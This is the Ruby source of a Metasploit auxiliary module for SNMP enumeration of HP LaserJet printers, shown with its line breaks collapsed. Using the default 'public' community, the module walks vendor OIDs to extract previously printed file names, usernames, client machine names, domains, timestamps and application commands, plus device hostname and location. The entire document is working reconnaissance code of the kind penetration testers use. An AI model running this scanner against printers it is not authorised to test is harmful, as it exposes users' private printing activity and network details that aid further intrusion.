HP LaserJet Printer SNMP Enumeration

### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Auxiliary  include Msf::Exploit::Remote::SNMPClient  include Msf::Auxiliary::Report  include Msf::Auxiliary::Scanner  def initialize(info = {})    super(update_info(info,      'Name'        => 'HP LaserJet Printer SNMP Enumeration',      'Description' => %q{        This module allows enumeration of files previously printed.        It provides details as filename, client, timestamp and username information.        The default community used is "public".      },      'References'  =>        [          [ 'URL', 'https://en.wikipedia.org/wiki/Simple_Network_Management_Protocol' ],          [ 'URL', 'https://net-snmp.sourceforge.io/docs/man/snmpwalk.html' ],          [ 'URL', 'http://www.nothink.org/codes/snmpcheck/index.php' ],          [ 'URL', 'http://www.securiteam.com/securitynews/5AP0S2KGVS.html' ],          [ 'URL', 'http://stuff.mit.edu/afs/athena/dept/cron/tools/share/mibs/290923.mib' ],        ],      'Author'      => 'Matteo Cantoni <goony[at]nothink.org>',      'License'     => MSF_LICENSE      ))  end  def run_host(ip)    begin      snmp = connect_snmp      vprint_status("Connecting to #{ip}")      output_data = []      output_data << "IP address  : #{ip}"      sysName = snmp.get_value('1.3.6.1.2.1.1.5.0').to_s      output_data << "Hostname    : #{sysName.strip}"      sysDesc = snmp.get_value('1.3.6.1.2.1.1.1.0').to_s      sysDesc.gsub!(/^\s+|\s+$|\n+|\r+/, ' ')      output_data << "Description : #{sysDesc.strip}"      sysContact = snmp.get_value('1.3.6.1.2.1.1.4.0').to_s      output_data << "Contact     : #{sysContact.strip}" if not sysContact.empty?      sysLocation = snmp.get_value('1.3.6.1.2.1.1.6.0').to_s      output_data << "Location    : #{sysLocation.strip}" if not sysLocation.empty?      output_data << ""      snmp.walk([        "1.3.6.1.4.1.11.2.3.9.4.2.1.1.6.5.1",    # job-info-name1  - document name1        "1.3.6.1.4.1.11.2.3.9.4.2.1.1.6.5.2",    # job-info-name2  - document name2        "1.3.6.1.4.1.11.2.3.9.4.2.1.1.6.5.23.1", # job-info-attr-1 - username        "1.3.6.1.4.1.11.2.3.9.4.2.1.1.6.5.23.2", # job-info-attr-2 - machine name        "1.3.6.1.4.1.11.2.3.9.4.2.1.1.6.5.23.3", # job-info-attr-3 - domain (?)        "1.3.6.1.4.1.11.2.3.9.4.2.1.1.6.5.23.4", # job-info-attr-4 - timestamp        "1.3.6.1.4.1.11.2.3.9.4.2.1.1.6.5.23.6", # job-info-attr-6 - application name        "1.3.6.1.4.1.11.2.3.9.4.2.1.1.6.5.23.7", # job-info-attr-7 - application command      ]) do |name1,name2,username,client,domain,timestamp,app_name,app_command|        filename = name1.value.to_s + name2.value.to_s        if (username.value.to_s !~ /noSuchInstance/)          if username.value.to_s =~ /^JobAcct(\d+)=(.*)/            username = $2          end        else          username = ''        end        if (client.value.to_s !~ /noSuchInstance/)          if client.value.to_s =~ /^JobAcct(\d+)=(.*)/            client = $2          end        else          client = ''        end        if (domain.value.to_s !~ /noSuchInstance/)          if domain.value.to_s =~ /^JobAcct(\d+)=(.*)/            domain = $2          end        else          domain = ''        end        if (timestamp.value.to_s !~ /noSuchInstance/)          if timestamp.value.to_s =~ /^JobAcct(\d+)=(.*)/            timestamp = $2          end        else          timestamp = ''        end        if (app_name.value.to_s !~ /noSuchInstance/)          if app_name.value.to_s =~ /^JobAcct(\d+)=(.*)/            app_name = $2          end        else          app_name = ''        end        if (app_command.value.to_s !~ /noSuchInstance/)          if app_command.value.to_s =~ /^JobAcct(\d+)=(.*)/            app_command = $2          end        else          app_command = ''        end        if not timestamp.empty?          output_data << "File name   : #{filename}"          output_data << "Username    : #{username}" if not username.empty?          output_data << "Client      : #{client}" if not client.empty?          output_data << "Domain      : #{domain}" if not domain.empty?          output_data << "Timestamp   : #{timestamp}" if not timestamp.empty?          output_data << "Application : #{app_name} (#{app_command})" if not app_name.empty?          output_data << ""        end      end      output_data.each do |row|        print_good("#{row}")      end      disconnect_snmp    rescue SNMP::RequestTimeout      print_error("#{ip}, SNMP request timeout.")    rescue Errno::ECONNREFUSED      print_error("#{ip}, Connection refused.")    rescue SNMP::InvalidIpAddress      print_error("#{ip}, Invalid IP Address. Check it with 'snmpwalk tool'.")    rescue ::Interrupt    raise $!    rescue ::Exception => e      print_error("#{ip}, Unknown error: #{e.class} #{e}")    end  endend